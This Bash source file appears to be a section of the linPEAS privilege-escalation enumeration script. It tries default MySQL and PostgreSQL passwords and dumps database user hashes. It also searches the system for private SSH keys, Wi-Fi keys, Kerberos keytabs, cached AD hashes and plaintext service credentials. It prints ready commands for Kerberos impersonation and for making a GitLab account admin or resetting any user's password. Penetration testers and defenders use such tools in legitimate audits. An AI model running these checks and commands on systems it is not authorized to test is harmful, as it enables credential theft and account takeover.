554 lines
20 KiB
Bash
554 lines
20 KiB
Bash
###########################################
|
|
#--------) Software Information (---------#
|
|
###########################################
|
|
|
|
#-- SI) Mysql version
|
|
print_2title "MySQL version"
|
|
mysql --version 2>/dev/null || echo_not_found "mysql"
|
|
echo ""
|
|
|
|
#-- SI) Mysql connection root/root
|
|
print_list "MySQL connection using default root/root ........... "
|
|
mysqlconnect=$(mysqladmin -uroot -proot version 2>/dev/null)
|
|
if [ "$mysqlconnect" ]; then
|
|
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
mysql -u root --password=root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
#-- SI) Mysql connection root/toor
|
|
print_list "MySQL connection using root/toor ................... "
|
|
mysqlconnect=$(mysqladmin -uroot -ptoor version 2>/dev/null)
|
|
if [ "$mysqlconnect" ]; then
|
|
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
mysql -u root --password=toor -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
#-- SI) Mysql connection root/NOPASS
|
|
mysqlconnectnopass=$(mysqladmin -uroot version 2>/dev/null)
|
|
print_list "MySQL connection using root/NOPASS ................. "
|
|
if [ "$mysqlconnectnopass" ]; then
|
|
echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
#-- SI) Mysql credentials
|
|
print_2title "Searching mysql credentials and exec"
|
|
if [ "$PSTORAGE_MYSQL" ]; then
|
|
printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
|
|
for f in $(find $d -name debian.cnf 2>/dev/null); do
|
|
if [ -r "$f" ]; then
|
|
echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
|
|
cat "$f"
|
|
fi
|
|
done
|
|
for f in $(find $d -name user.MYD 2>/dev/null); do
|
|
if [ -r "$f" ]; then
|
|
echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
|
|
grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password"
|
|
fi
|
|
done
|
|
for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
|
|
if [ -r "$f" ]; then
|
|
u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
|
|
echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
|
|
fi
|
|
done
|
|
for f in $(find $d -name my.cnf 2>/dev/null); do
|
|
if [ -r "$f" ]; then
|
|
echo "Found readable $f"
|
|
grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
|
|
fi
|
|
done
|
|
mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
|
|
if [ "$mysqlexec" ]; then
|
|
echo "Found $mysqlexec"
|
|
echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
|
|
fi
|
|
done
|
|
else echo_not_found
|
|
fi
|
|
echo ""
|
|
|
|
peass{MariaDB}
|
|
|
|
peass{PostgreSQL}
|
|
|
|
#-- SI) PostgreSQL brute
|
|
if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script. Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
|
|
#checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
|
|
print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
|
|
if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
|
|
if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
|
|
if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
|
|
print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
|
|
if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
echo ""
|
|
fi
|
|
|
|
peass{Mongo}
|
|
|
|
peass{Apache}
|
|
|
|
peass{Tomcat}
|
|
|
|
peass{FastCGI}
|
|
|
|
peass{Http_conf}
|
|
|
|
peass{Htpasswd}
|
|
|
|
peass{PHP Sessions}
|
|
|
|
peass{Wordpress}
|
|
|
|
peass{Drupal}
|
|
|
|
peass{Moodle}
|
|
|
|
peass{Supervisord}
|
|
|
|
peass{Cesi}
|
|
|
|
peass{Rsync}
|
|
|
|
peass{Hostapd}
|
|
|
|
#-- SI) Wifi conns
|
|
print_2title "Searching wifi conns file"
|
|
wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null)
|
|
if [ "$wifi" ]; then
|
|
printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done
|
|
else echo_not_found
|
|
fi
|
|
echo ""
|
|
|
|
peass{Anaconda ks}
|
|
|
|
peass{VNC}
|
|
|
|
peass{Ldap}
|
|
|
|
peass{OpenVPN}
|
|
|
|
#-- SI) ssh files
|
|
print_2title "Searching ssl/ssh files"
|
|
if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
|
|
sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
|
|
hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
|
|
hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
|
|
|
|
peass{SSH}
|
|
|
|
grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
|
|
|
|
if [ "$TIMEOUT" ]; then
|
|
privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
|
|
privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
|
|
privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
|
|
privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
|
|
else
|
|
privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
|
|
privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
|
|
fi
|
|
|
|
if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
|
|
echo ""
|
|
print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
|
|
if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
|
|
if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
|
|
if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
|
|
if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
|
|
echo ""
|
|
fi
|
|
if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
|
|
print_3title "Some certificates were found (out limited):"
|
|
printf "$certsb4_grep\n" | head -n 20
|
|
printf "$$PSTORAGE_CERTSBIN\n" | head -n 20
|
|
echo ""
|
|
fi
|
|
if [ "$PSTORAGE_CERTSCLIENT" ]; then
|
|
print_3title "Some client certificates were found:"
|
|
printf "$PSTORAGE_CERTSCLIENT\n"
|
|
echo ""
|
|
fi
|
|
if [ "$PSTORAGE_SSH_AGENTS" ]; then
|
|
print_3title "Some SSH Agent files were found:"
|
|
printf "$PSTORAGE_SSH_AGENTS\n"
|
|
echo ""
|
|
fi
|
|
if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
|
|
print_3title "Listing SSH Agents"
|
|
ssh-add -l
|
|
echo ""
|
|
fi
|
|
if [ "$PSTORAGE_SSH_CONFIG" ]; then
|
|
print_3title "Some home ssh config file was found"
|
|
printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
|
|
echo ""
|
|
fi
|
|
if [ "$hostsdenied" ]; then
|
|
print_3title "/etc/hosts.denied file found, read the rules:"
|
|
printf "$hostsdenied\n"
|
|
cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
|
|
echo ""
|
|
fi
|
|
if [ "$hostsallow" ]; then
|
|
print_3title "/etc/hosts.allow file found, trying to read the rules:"
|
|
printf "$hostsallow\n"
|
|
cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
|
|
echo ""
|
|
fi
|
|
if [ "$sshconfig" ]; then
|
|
echo ""
|
|
echo "Searching inside /etc/ssh/ssh_config for interesting info"
|
|
grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) PAM auth
|
|
print_2title "Searching unexpected auth lines in /etc/pam.d/sshd"
|
|
pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth)
|
|
if [ "$pamssh" ]; then
|
|
grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED},"
|
|
else echo_no
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) NFS exports
|
|
print_2title "NFS exports?"
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"
|
|
if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED},"
|
|
else echo_not_found "/etc/exports"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Kerberos
|
|
print_2title "Searching kerberos conf files and tickets"
|
|
print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory"
|
|
kadmin_exists="$(command -v kadmin)"
|
|
klist_exists="$(command -v klist)"
|
|
if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
|
|
if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
|
|
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
|
|
if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
|
|
else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
|
|
fi
|
|
|
|
printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
|
|
if [ -r "$f" ]; then
|
|
if echo "$f" | grep -q .k5login; then
|
|
echo ".k5login file (users with access to the user who has this file in his home)"
|
|
cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
|
|
elif echo "$f" | grep -q keytab; then
|
|
echo ""
|
|
echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
|
|
klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
|
|
printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
|
|
if [ "$l" ] && echo "$l" | grep -q "@"; then
|
|
printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
|
|
#kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
|
|
#We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
|
|
fi
|
|
done
|
|
elif echo "$f" | grep -q krb5.conf; then
|
|
ls -l "$f"
|
|
cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
|
|
elif echo "$f" | grep -q kadm5.acl; then
|
|
ls -l "$f"
|
|
cat "$f" 2>/dev/null
|
|
elif echo "$f" | grep -q sssd.conf; then
|
|
ls -l "$f"
|
|
cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
|
|
elif echo "$f" | grep -q secrets.ldb; then
|
|
echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
|
|
ls -l "$f"
|
|
elif echo "$f" | grep -q .secrets.mkey; then
|
|
echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
|
|
ls -l "$f"
|
|
fi
|
|
fi
|
|
done
|
|
ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
|
|
klist 2>/dev/null || echo_not_found "klist"
|
|
echo ""
|
|
|
|
peass{Knockd}
|
|
|
|
peass{Kibana}
|
|
|
|
peass{Elasticsearch}
|
|
|
|
##-- SI) Logstash
|
|
print_2title "Searching logstash files"
|
|
if [ "$PSTORAGE_LOGSTASH" ]; then
|
|
printf "$PSTORAGE_LOGSTASH\n"
|
|
printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
|
|
if [ -r "$d/startup.options" ]; then
|
|
echo "Logstash is running as user:"
|
|
cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
|
|
fi
|
|
cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
|
|
cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
|
|
done
|
|
else echo_not_found
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Vault-ssh
|
|
print_2title "Searching Vault-ssh files"
|
|
if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then
|
|
printf "$PSTORAGE_VAULT_SSH_HELPER\n"
|
|
printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
|
|
echo ""
|
|
vault secrets list 2>/dev/null
|
|
printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
|
|
else echo_not_found "vault-ssh-helper.hcl"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Cached AD Hashes
|
|
adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
|
|
print_2title "Searching AD cached hashes"
|
|
if [ "$adhashes" ]; then
|
|
ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
|
|
else echo_not_found "cached hashes"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Screen sessions
|
|
print_2title "Searching screen sessions"
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
|
|
screensess=$(screen -ls 2>/dev/null)
|
|
if [ "$screensess" ]; then
|
|
printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
|
|
else echo_not_found "screen"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Tmux sessions
|
|
tmuxdefsess=$(tmux ls 2>/dev/null)
|
|
tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
|
|
print_2title "Searching tmux sessions"$N
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
|
|
if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
|
|
printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
|
|
else echo_not_found "tmux"
|
|
fi
|
|
echo ""
|
|
|
|
peass{CouchDB}
|
|
|
|
peass{Redis}
|
|
|
|
#-- SI) Dovecot
|
|
# Needs testing
|
|
print_2title "Searching dovecot files"
|
|
dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
|
|
if [ -z "$dovecotpass" ]; then
|
|
echo_not_found "dovecot credentials"
|
|
else
|
|
for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do
|
|
df=$(echo $d |cut -d ':' -f1)
|
|
dp=$(echo $d |cut -d ':' -f2-)
|
|
echo "Found possible PLAIN text creds in $df"
|
|
echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
|
|
done
|
|
fi
|
|
echo ""
|
|
|
|
peass{Mosquitto}
|
|
|
|
peass{Neo4j}
|
|
|
|
peass{Cloud Credentials}
|
|
|
|
peass{Cloud Init}
|
|
|
|
peass{CloudFlare}
|
|
|
|
peass{Erlang}
|
|
|
|
peass{GMV Auth}
|
|
|
|
peass{IPSec}
|
|
|
|
peass{IRSSI}
|
|
|
|
peass{Keyring}
|
|
|
|
peass{Filezilla}
|
|
|
|
peass{Backup Manager}
|
|
|
|
##-- SI) passwd files (splunk)
|
|
print_2title "Searching uncommon passwd files (splunk)"
|
|
SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
|
|
if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
|
|
printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
|
|
if [ -f "$f" ] && ! [ -x "$f" ]; then
|
|
echo "passwd file: $f" | sed "s,$f,${SED_RED},"
|
|
cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
|
|
fi
|
|
done
|
|
echo ""
|
|
|
|
print_2title "Analyzing kcpassword files"
|
|
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
|
|
printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do
|
|
echo "$f" | sed -${E} "s,.*,${SED_RED},"
|
|
base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
|
|
done
|
|
echo ""
|
|
|
|
##-- SI) Gitlab
|
|
print_2title "Searching GitLab related files"
|
|
#Check gitlab-rails
|
|
if [ "$(command -v gitlab-rails)" ]; then
|
|
echo "gitlab-rails was found. Trying to dump users..."
|
|
gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
|
|
echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
|
|
echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
|
|
echo ""
|
|
fi
|
|
if [ "$(command -v gitlab-backup)" ]; then
|
|
echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
|
|
echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
|
|
echo ""
|
|
fi
|
|
#Check gitlab files
|
|
printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
|
|
if echo $f | grep -q secrets.yml; then
|
|
echo "Found $f" | sed "s,$f,${SED_RED},"
|
|
cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
|
|
elif echo $f | grep -q gitlab.yml; then
|
|
echo "Found $f" | sed "s,$f,${SED_RED},"
|
|
cat "$f" | grep -A 4 "repositories:"
|
|
elif echo $f | grep -q gitlab.rb; then
|
|
echo "Found $f" | sed "s,$f,${SED_RED},"
|
|
cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
|
|
fi
|
|
echo ""
|
|
done
|
|
echo ""
|
|
|
|
peass{Github}
|
|
|
|
peass{Svn}
|
|
|
|
peass{PGP-GPG}
|
|
|
|
peass{Cache Vi}
|
|
|
|
peass{Wget}
|
|
|
|
##-- SI) containerd installed
|
|
print_2title "Checking if containerd(ctr) is available"
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation"
|
|
containerd=$(command -v ctr)
|
|
if [ "$containerd" ]; then
|
|
echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
|
|
ctr image list
|
|
fi
|
|
echo ""
|
|
|
|
##-- SI) runc installed
|
|
print_2title "Checking if runc is available"
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation"
|
|
runc=$(command -v runc)
|
|
if [ "$runc" ]; then
|
|
echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Docker
|
|
print_2title "Searching docker files (limit 70)"
|
|
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket"
|
|
printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
|
|
ls -l "$f" 2>/dev/null
|
|
if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
|
|
echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
|
|
fi
|
|
done
|
|
echo ""
|
|
|
|
peass{Firefox}
|
|
|
|
peass{Chrome}
|
|
|
|
peass{Autologin}
|
|
|
|
#-- SI) S/Key athentication
|
|
print_2title "S/Key authentication"
|
|
if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then
|
|
printf "System supports$RED S/Key$NC authentication\n"
|
|
if ! [ -d /etc/skey/ ]; then
|
|
echo "${GREEN}S/Key authentication enabled, but has not been initialized"
|
|
elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
|
|
echo "${RED}/etc/skey/ is writable by you"
|
|
ls -ld /etc/skey/
|
|
else
|
|
ls -ld /etc/skey/ 2>/dev/null
|
|
fi
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) YubiKey athentication
|
|
print_2title "YubiKey authentication"
|
|
if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then
|
|
printf "System supports$RED YubiKey$NC authentication\n"
|
|
if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
|
|
echo "${RED}/var/db/yubikey/ is writable by you"
|
|
ls -ld /var/db/yubikey/
|
|
else
|
|
ls -ld /var/db/yubikey/ 2>/dev/null
|
|
fi
|
|
fi
|
|
echo ""
|
|
|
|
#-- SI) Passwords inside pam.d
|
|
print_2title "Passwords inside pam.d"
|
|
grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
|
|
echo ""
|
|
|
|
|
|
|
|
peass{SNMP}
|
|
|
|
peass{Pypirc}
|
|
|
|
peass{Postfix}
|
|
|
|
peass{Ldaprc}
|
|
|
|
peass{Env}
|
|
|
|
peass{Msmtprc}
|
|
|
|
peass{Keepass}
|
|
|
|
peass{FTP}
|
|
|
|
peass{EXTRA_SECTIONS}
|
|
|
|
peass{Interesting logs}
|
|
|
|
peass{Windows Files}
|
|
|
|
peass{Other Interesting Files}
|